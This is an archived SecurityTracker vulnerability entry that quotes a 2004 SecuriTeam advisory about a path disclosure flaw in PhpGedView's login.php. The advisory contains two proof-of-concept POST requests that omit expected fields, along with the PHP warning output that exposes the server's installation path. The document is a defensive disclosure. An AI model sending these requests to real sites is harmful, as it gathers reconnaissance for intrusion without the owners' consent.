SecurityTracker.com Archives - PhpGedView 'login.php' Discloses Installation Path to Remote Users

	Keep Track of the Latest Vulnerabilities with SecurityTracker!

SecurityTracker
Archives

Sign Up

Instant Alerts

Buy our Premium Vulnerability Notification Service to receive customized, instant alerts

Affiliates

Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!

Partners

Become a Partner and License Our Database or Notification Service

Report a Bug

Report a vulnerability that you have found to SecurityTracker
bugs
@
securitytracker.com

Category: Application (Generic) > PhpGedView

Vendors: phpgedview.sourceforge.net

PhpGedView 'login.php' Discloses Installation Path to Remote Users

SecurityTracker Alert ID: 1008844

CVE Reference: CAN-2004-0130 (Links to External Site)

Updated: Feb 4 2004

Original Entry Date: Jan 26 2004

Impact: Disclosure of system information, Disclosure of user information

Exploit Included: Yes Vendor Confirmed: Yes

Version(s): 2.65 and prior versions

Description: An information disclosure vulnerability was reported in PhpGedView. A remote user can determine the installation path.

SecuriTeam posted a report credited to Cedric Cochin regarding a flaw in 'login.php' that allows a remote user to determine the installation path.

A remote user can submit a POST request without the username and password variables to cause the system to display the installation path. A remote authenticated user can also submit a POST request that is missing the 'usertime' variable to view the installation path.

Impact: A remote user or a remote authenticated user can determine the installation path.

Solution: No solution was available at the time of this entry. The vendor reportedly plans to issue a fix shortly in version 2.65.2.

Vendor URL: phpgedview.sourceforge.net/ (Links to External Site)

Cause: Access control error, Exception handling error

Underlying OS: Linux (Any), UNIX (Any), Windows (Any)

Reported By: SecuriTeam <support@securiteam.com>

Message History: None.

Source Message Contents

Date: 26 Jan 2004 13:13:36 +0200
From: SecuriTeam <support@securiteam.com>
Subject: [UNIX] PhpGedView Path Disclosure Vulnerability

 

The following security advisory is sent to the securiteam mailing list, and can be found at the Secur
iTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html 

- - - - - - - - -



  PhpGedView Path Disclosure Vulnerability
------------------------------------------------------------------------


SUMMARY

 <http://phpGedView.sourceforge.net> phpGedView is an open source system 
for online viewing of Gedcom information (family tree and genology 
information).
A security problem in the product allows attackers to gather the true path 
of the server-side script.

DETAILS

Vulnerable Systems:
 * phpGedView version 2.65 and prior

The login.php script is not testing if a variable which is supposed to be 
POSTed has been defined before using it.

Example:

I - Path disclosure

-- HTTP Client Request --

http://target/phpGedView/login.php POST DATA: action=login

-- HTTP Client Request --

Username  and  password are  missing  and will  generate  an PHP  error  
message
displaying the Real Path.

-- HTTP Server Reply --

< br /> < b>Warning< /b>:  Undefined index:  username in
< b>/var/www/phpGedView/login.php< /b> on line < b>36< /b>< br /> < 
br />
< b>Warning< /b>:  Undefined index:  password in
< b>/var/www/phpGedView/login.php< /b> on line < b>36< /b>< br /> < 
br />
< b>Warning< /b>:  Cannot add header information - headers already sent by 
(output
started at /var/www/phpGedView/login.php:36) in
< b>/var/www/phpGedView/functions_print.php< /b> on line < b>492< /b>< br 
/>

-- HTTP Server Reply --

                  -------------------------------------------

II - Path disclosure with a valid user account

-- HTTP Client Request --

http://target/phpGedView/login.php POST DATA:
action=login&url=editconfig.php&usertime=&username=admin&password=login

-- HTTP Client Request --

Username/password  must be  a valid  couple. The  usertime is  missing and 
 will
generate an PHP error message displaying the Real Path.

-- HTTP Server Reply --

< br /> < b>Warning< /b>:  strtotime() called with empty time parameter in
< b>/var/www/phpGedView/login.php< /b> on line < b>39< /b>< br< br />
 < 
b>Warning< /b>:
Cannot add header information - headers already sent by (output started at
/var/www/phpGedView/login.php:39) in < b>/var/www/phpGedView/login.php< 
/b> on
line < b>44< /b>< br />  />

-- HTTP Server Reply --

Vendor Status:
The vendor has been notified and a release version 2.65.2 with fixes for 
all the above mentioned vulnerabilities will be available soon.


ADDITIONAL INFORMATION

The information has been provided by  <mailto:cco@netvigilance.com> Cedric 
Cochin



======================================== 


This bulletin is sent to members of the SecuriTeam mailing list. 
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@secu
riteam.com 
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.co
m 


==================== 
==================== 

DISCLAIMER: 
The information in this bulletin is provided "AS IS" without warranty of any kind. 
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, con
sequential, loss of business
 profits or special damages.

Go to the Top of This SecurityTracker Archive Page

Home | View Topics | Search | Contact Us | Help
Copyright 2004, SecurityGlobal.net LLC